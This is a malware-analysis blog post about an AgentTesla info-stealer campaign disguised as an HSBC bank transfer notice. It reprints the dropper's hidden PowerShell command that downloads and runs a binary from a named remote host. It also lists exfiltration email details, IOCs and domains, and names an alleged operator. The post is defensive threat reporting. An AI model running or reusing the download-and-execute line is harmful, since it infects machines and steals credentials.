AgentTesla Keylogger Campaigns Continue

Office Macro Malware

WE still see loads of AgentTesla keylogger/ Info-stealer malware campaigns hitting the UK most days. I don’t often post them here, unless there is something slightly different or unusual about either the delivery method or the malware itself changes. I just submit to Antivirus companies & most times tweet the details to other security researchers.

Today’s version is very slightly different and pretends to be a Bank Transfer Payment Notification allegedly coming from The Hongkong and Shanghai Banking Limited.

The email is the usual junk email that should be blocked by most spam filters. The attachment is a .rar file but has been programmed ( probably in error) to be a part of a multi file archive. These only open in winrar not in most versions of winzip or windows inbuilt archive extraction tools. It isn’t overly common for AgentTesla to use bat files as part of the delivery system.

This bat file simply contains a windows powershell script telling it to download the AgentTesla binary from a remote site, move it to %temp% and run it.

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php’,’%TEMP%\Test.exe’);Start-Process ‘%TEMP%\Test.exe’

The website riderit.com appears to be a file hosting / public web based back up service. Connections to it from UK are extremely slow. We have seen quite a few different malware versions distributed via this network over recent months

Transfer Copy swift.r00 : Extracts to: Transfer Copy swift.Bat Current Virus total detections: anyrun|

Downloads the AgentTesla binary from http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php VirusTotal [web] [file] This malware binary has been known about on VirusTotal for about 1 month now.

This exfils via SMTP using mail.trezaexim.com using shivang@trezaexim.com & sending to maridiankft@gmail.com. I have seen numerous email addresses on trezaexim.com being used for these AgentTesla keylogger / info-stealer campaigns all sending to maridiankft@gmail.com who appears to be the listed registrant for the domain and has a Nigerian address and phone number. The user name Mrfred434 has 8 other domains listed under that name & the email address has 15 domains listed:

I have not checked how many are still live & active: Most are registered via PDR

interloom-pe.com 2018-10-23 publicdomainregistry.com
email-basware.com 2018-10-18 publicdomainregistry.com
ltssa-wood.com 2018-12-28 publicdomainregistry.com
luminosindia.com 2018-12-12 publicdomainregistry.com
tongiai.com 2019-02-01 publicdomainregistry.com
seastar-mairtime.com 2018-11-05 publicdomainregistry.com
mackereloiltools.com 2018-10-03 publicdomainregistry.com
trazaexim.com 2018-09-15 publicdomainregistry.com

almursad.com 2018-09-10 publicdomainregistry.com
grabsts.net 2019-03-07 publicdomainregistry.com
menexp.com 2018-08-13 publicdomainregistry.com
tytcwasteequipment.com 2019-07-21 publicdomainregistry.com
krress.com 2019-07-21 publicdomainregistry.com
kedahauji.com 2018-09-13 web4africa.net
evas-tr.com 2019-07-18 publicdomainregistry.com

Then we dig a bit more & find a name Frederick Agwu associated with the email address who has a further 40 domains listed

kedahauji.com 2018-09-13 web4africa.net
treassolutions.com 2015-12-04 publicdomainregistry.com
diplomatic-securityservice.com 2015-11-26 publicdomainregistry.com
govinadsteel.com 2017-08-07 publicdomainregistry.com
synmirise.com 2017-07-26 publicdomainregistry.com
supramexfire.com 2017-06-05 publicdomainregistry.com
hybsz-pl.com 2017-03-02 publicdomainregistry.com
magosnegt.net 2017-02-23 publicdomainregistry.com
hugoslyltd.com 2017-01-16 publicdomainregistry.com
halifacxz.com 2017-01-16 publicdomainregistry.com
weviio.com 2016-11-25 publicdomainregistry.com
lloydssbank.net 2016-09-17 publicdomainregistry.com
teromoto.com 2016-09-05 publicdomainregistry.com
ts-qlocal.com 2016-09-02 publicdomainregistry.com
tgf-group-cin.com 2016-09-02 publicdomainregistry.com
combinaparts.com 2016-08-31 publicdomainregistry.com
armada-shiping.com 2016-08-29 publicdomainregistry.com
dongfangpart.com 2016-08-02 publicdomainregistry.com
techno–filt.com 2016-07-10 publicdomainregistry.com
szlongzhang.com 2016-06-10 publicdomainregistry.com
geraldschembers.com 2016-05-28 publicdomainregistry.com
mod-ec.com 2016-04-05 publicdomainregistry.com
arkocmuh.com 2016-01-27 publicdomainregistry.com
setorp.com 2016-01-12 publicdomainregistry.com
bibby-ste-criox.com 2017-08-07 publicdomainregistry.com
velebattery.com 2017-03-15 publicdomainregistry.com
newgenerals.net 2017-01-16 publicdomainregistry.com
tqtal.com 2016-12-09 publicdomainregistry.com
bevaria-firefighting.com 2016-02-05 publicdomainregistry.com
highflly-sh.com 2016-08-29 publicdomainregistry.com
0mbg.net 2016-06-21 publicdomainregistry.com
rroca.net 2016-04-04 publicdomainregistry.com
diplomatics-securityservice.com 2016-01-07 publicdomainregistry.com
diplomatic-securityservices.com 2016-01-07 publicdomainregistry.com
pyrazienspecialties.com 2017-08-10 publicdomainregistry.com
defaomfg.com 2016-12-13 publicdomainregistry.com
asiastarbevarage.com 2016-05-15 publicdomainregistry.com
aeeccnc.com 2017-08-16 publicdomainregistry.com
scandl.net 2017-03-19 publicdomainregistry.com
takweenei.com 2017-08-09 publicdomainregistry.com
floawsreve.com 2017-08-17 namebright.com
masteel-uk.com 2016-12-12 publicdomainregistry.com
dkm-e.com 2016-01-11 ascio.com
dhl-expres.com 2016-04-04 ilovecom
wangyamotor.com 2016-06-24
tekasago.com 2017-08-04 domains.google.com

Even more digging finds yet another email address infocrescentksa@yahoo.com with 51 listed domains

diplomatics-securityservice.com 2016-01-07 publicdomainregistry.com
setorp.com 2016-01-12 publicdomainregistry.com
arkocmuh.com 2016-01-27 publicdomainregistry.com
rroca.net 2016-04-04 publicdomainregistry.com
mod-ec.com 2016-04-05 publicdomainregistry.com
asiastarbevarage.com 2016-05-15 publicdomainregistry.com
geraldschembers.com 2016-05-28 publicdomainregistry.com
szlongzhang.com 2016-06-10 publicdomainregistry.com
0mbg.net 2016-06-21 publicdomainregistry.com
techno–filt.com 2016-07-10 publicdomainregistry.com
dongfangpart.com 2016-08-02 publicdomainregistry.com
highflly-sh.com 2016-08-29 publicdomainregistry.com
armada-shiping.com 2016-08-29 publicdomainregistry.com
combinaparts.com 2016-08-31 publicdomainregistry.com
tgf-group-cin.com 2016-09-02 publicdomainregistry.com
ts-qlocal.com 2016-09-02 publicdomainregistry.com
teromoto.com 2016-09-05 publicdomainregistry.com
lloydssbank.net 2016-09-17 publicdomainregistry.com
bevaria-firefighting.com 2016-02-05 publicdomainregistry.com
weviio.com 2016-11-25 publicdomainregistry.com
tqtal.com 2016-12-09 publicdomainregistry.com
defaomfg.com 2016-12-13 publicdomainregistry.com
halifacxz.com 2017-01-16 publicdomainregistry.com
newgenerals.net 2017-01-16 publicdomainregistry.com
hugoslyltd.com 2017-01-16 publicdomainregistry.com
magosnegt.net 2017-02-23 publicdomainregistry.com
hybsz-pl.com 2017-03-02 publicdomainregistry.com
velebattery.com 2017-03-15 publicdomainregistry.com
scandl.net 2017-03-19 publicdomainregistry.com
supramexfire.com 2017-06-05 publicdomainregistry.com
neatorobatic.com 2015-10-07 enom.com
opulant-group.com 2015-10-07 enom.com
serashkco.com 2015-10-04 enom.com
ghosexport.com 2015-09-13 enom.com
reffco.net 2015-09-10 enom.com
woodenweres.com 2015-09-08 enom.com
stemcoo.com 2015-08-29 enom.com
perfactintl.com 2015-08-28 enom.com
ratnakerovarseas.com 2015-08-24 enom.com
thermoleb.com 2015-07-13 enom.com
oranga-fr.com 2015-08-26 enom.com
asferholding.com 2015-08-26 enom.com
synmirise.com 2017-07-26 publicdomainregistry.com
govinadsteel.com 2017-08-07 publicdomainregistry.com
takweenei.com 2017-08-09 publicdomainregistry.com
pyrazienspecialties.com 2017-08-10 publicdomainregistry.com
aeeccnc.com 2017-08-16 publicdomainregistry.com

I am sure if I kept digging or someone with more time can find hundreds more domains associated with these Nigerian criminals and hopefully law enforcent can take some action.

You can now submit suspicious sites, emails and files via our Submissions system

Neither The Hongkong and Shanghai Banking Limited nor contact@crimbotour.ro has been hacked or had their email or other servers compromised. They are not sending the emails to you. They are just innocent victims in exactly the same way as every recipient of these emails. These are coming from a Vietnam IP address 103.125.189.115 that is very well known for all sorts of malicious activity.

This malware file downloads from

One of the emails looks like:

From: The Hongkong and Shanghai Banking Limited <contact@crimbotour.ro>

Date: Wed 11/09/2019 02:41

Subject: Bank Transfer Payment Notification

Attachment: Transfer Copy swift.r00

Body Content:

Our Ref: HSBCT8723.

Find enclosed Hire payment proof made to your company account on behalf of our client to your receiving bank dated 10/09/2019.

Kindly confirm payment and client Ref details from attached swift Copy and advice accordingly.

Thanks and regards,
David Wong
Funds Transfer Dept.,
Business Banking, Eastern District, Commercial Banking
The Hongkong and Shanghai Banking Corporation Limited (HSBC)
14/F, Causeway Bay Plaza Two, 463-483 Lockhart Road,
Causeway Bay, Hong Kong.
Email: customerservice@hsbc.com.hk

Screenshot:

These malicious attachments normally have a password stealing component, with the aim of stealing your bank, PayPal or other financial details along with your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your Facebook and other social network log in details. A very high proportion are Ransomware versions that encrypt your files and demand money ( about £350/$400) to recover the files.

All the alleged senders, amounts, reference numbers, Bank codes, companies, names of employees, employee positions, email addresses and phone numbers mentioned in the emails are all random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.

Please read our How to protect yourselves page for simple, sensible advice on how to avoid being infected by this sort of socially engineered malware.

This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC / PDF / JPG or other common file instead of the .EXE / .JS file it really is, so making it much more likely for you to accidentally open it and be infected.

Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day.

The basic rule is NEVER open any attachment to an email, unless you are expecting it. Now that is very easy to say but quite hard to put into practice, because we all get emails with files attached to them. Our friends and family love to send us pictures of them doing silly things, or even cute pictures of the children or pets.

Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Many malicious files that are attached to emails will have a faked extension. That is the 3 letters at the end of the file name. Unfortunately windows by default hides the file extensions so you need to Set your folder options to “show known file types. Then when you unzip the zip file that is supposed to contain the pictures of “Sally’s dog catching a ball” or a report in word document format that work has supposedly sent you to finish working on at the weekend, or an invoice or order confirmation from some company, you can easily see if it is a picture or document & not a malicious program.

If you see JS or .EXE or .COM or .PIF or .SCR or .HTA .vbs, .wsf , .jse .jar at the end of the file name DO NOT click on it or try to open it, it will infect you.

While the malicious program is inside the zip file, it cannot harm you or automatically run. When it is just sitting unzipped in your downloads folder it won’t infect you, provided you don’t click it to run it. Just delete the zip and any extracted file and everything will be OK.

You can always run a scan with your antivirus to be sure. There are some zip files that can be configured by the bad guys to automatically run the malware file when you double click the zip to extract the file. If you right click any suspicious zip file received, and select extract here or extract to folder ( after saving the zip to a folder on the computer) that risk is virtually eliminated.

Never attempt to open a zip directly from your email, that is a guaranteed way to get infected. The best way is to just delete the unexpected zip and not risk any infection.

IOC:

Main object- “Transfer Copy swift.r00”
sha256 c173764e5b509cf3d53503cd58dd35aee0d74a82da1de4c1252667a263638265
sha1 44d8a0fdbf99ce48f0c7b8a6cb4b0c0187557d98
md5 ad695f5ee0d5767da3305522d819b4f1
Dropped executable file
sha256 C:\Users\admin\AppData\Local\Temp\Test.exe 33d2ee7d7ef16344682b121cee3fb189dbdcc070ab7552b150360e418d700a4c
MD5 131c2c561ed08be561321f706140bd43
SHA-1 21d665dd0c37648ab018fff4b06889e14cbe7e16
DNS requests
domain checkip.amazonaws.com
domain web.riderit.com
domain mail.trezaexim.com
Connections
ip 18.205.71.63
ip 216.55.169.138
ip 1.217.125.148
HTTP/HTTPS requests
url http://web.riderit.com:8000/ajp/public/5a2eec141864de49a45bb29ac52dbe6b.php
url http://checkip.amazonaws.com/

maridiankft@gmail.com

infocrescentksa@yahoo.com

Frederick Agwu

Total
0
Shares
Leave a Reply

Your email address will not be published.

Related Posts